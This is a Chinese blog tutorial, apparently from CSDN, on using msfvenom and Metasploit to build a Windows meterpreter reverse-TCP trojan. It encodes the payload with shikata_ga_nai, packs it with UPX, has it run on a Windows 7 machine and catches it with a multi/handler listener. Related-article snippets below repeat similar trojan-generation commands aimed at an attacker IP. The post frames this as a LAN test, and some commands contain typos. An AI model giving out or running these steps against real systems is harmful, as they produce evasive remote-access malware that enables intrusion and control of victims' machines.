msfvenom

最新推荐文章于 2024-07-03 18:58:43 发布
最新推荐文章于 2024-07-03 18:58:43 发布
阅读量4.2k 收藏 10
点赞数 2
分类专栏: 安全 Tools CTF 文章标签: msfvenom
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZmeiXuan/article/details/78061755
版权
安全 同时被 3 个专栏收录
54 篇文章 0 订阅
订阅专栏
Tools
18 篇文章 1 订阅
订阅专栏
CTF
11 篇文章 0 订阅
订阅专栏

摘要

在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。

msfvenom

:>>>

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.

  • 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
  • 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
  • 工具:MSF.

0x00

开启:postgresql

root@kali:~# service postgresql start

查看帮助

命令:

root# msfvenom -h

这里写图片描述

部分参数:>>>

-p 选择一个载荷[payload],或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
-f exe 生成EXE格式
LHOST,LPORT 监听上线的主机IP和端口

文件格式:>>>
不同的平台需要的不同,来看看支持生成的格式

root@kali:~# msfvenom --help-formats
Error: Executable formats
    asp, aspx, aspx-exe, dll, elf, elf-so, 
exe, exe-only, exe-service, exe-small, hta-psh, 
loop-vbs, macho, msi, msi-nouac, osx-app, psh, 
psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
    bash, c, csharp, dw, dword, hex, java, js_be, js_le, 
num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

过程

2、生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令:>>>

 root# msfvenom -p windows/meterpreter/reverse_tcp -o
3、现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: >>>

root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
4、upx加壳:>>>
upx -5 /root/Desktop/acn.exe
4、把生成的abc.exe放到win7下.执行.
5、在命令行下,打开msfconsole.

命令:>>>

root # msfconsole

6、本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: >>>

msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

生成一个程序的过程

[http://www.jianshu.com/p/8d3f94390eab]

ChengKaoAO
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3781
msfvenom的使用
Msfvenom使用指南
m0_57221101的博客
02-08 6096
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
【木马生成工具】Msfvenom介绍及利用
最新发布
aheyor的博客
07-03 1080
msfvenom aMetasploitstandalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
msfvenom 基本使用
blackguest07的博客
03-05 1493
msfvenom 基础命令
msfvenom常见的使用命令
路baby的博客
06-24 2657
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
msfvenom基本使用
02-24
`msfvenom` 是 Metasploit 框架中的一个强大工具,用于创建各种类型的恶意软件或后门。在渗透测试中,它被广泛用于生成定制的payload,以适应不同的攻击场景和目标环境。以下是对 `msfvenom` 基本使用和相关知识点的...
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom Payload 生成命令详解 MSFVenom 是 Metasploit Framework 中的一个组件,用于生成 Payload, Payload 是攻击者在攻击目标系统时使用的恶意代码。MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac...
第三十课:解决msfvenom命令自动补全.docx
09-15
解决msfvenom命令自动补全 在这篇文章中,我们将学习如何解决msfvenom命令的自动补全问题。在 Metasploit Framework 项目中,msfvenom 是一个功能强大且灵活的 payload 生成工具,但是它的参数非常繁琐,这使得使用...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
`msfvenom`是Metasploit框架的一部分,是一个强大的工具,可以生成各种类型的恶意软件payload,用于渗透测试。以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建...
MSF木马的简单利用
god_Zeo的安全博客
06-06 1336
刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他 环境和那一片的一样 msfvenom模块,首先生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe 1.exe 就是木马 要把这个用各种方法去受害机运行 2. 输入msfconso...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3346
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
Metasploit 原理 使用
煮酒闲谈
08-13 3656
About Metasploit____________________________________________________________________________________________________________________________________________-Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问
metasploit之msfvenom
Yale的博客
01-31 2485
先来看看msfvenom的帮助菜单 我们先来看一个示例 使用Msfvenom生成一个windows下的绑定shell的shellcode,使用shikata_ga_nai编码器,迭代编码了三次,过滤了null字符,使用python格式 我们可以使用-platform指定很多平台,上面的例子指定的是windows下的,我们同样也可以指定cisco,os x,solaris,bsd等 使用—hel...
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4682
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
msfvenom参数总结
Fng的博客
09-19 1108
kali中的msfvenom取代了msfpayload和msfencode,常用于生成木马。
Msfvenonm生成后门
weixin_44110913的博客
08-02 2101
目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。 Ms...
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
msfvenom 检测
10-04
msfvenom是Metasploit框架中的一个工具,用于生成各种类型的恶意软件。由于其具有强大的功能和广泛的应用,攻击者可能会使用msfvenom来制作恶意软件,以进行网络攻击和渗透测试。 要检测msfvenom,我们可以采取以下...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值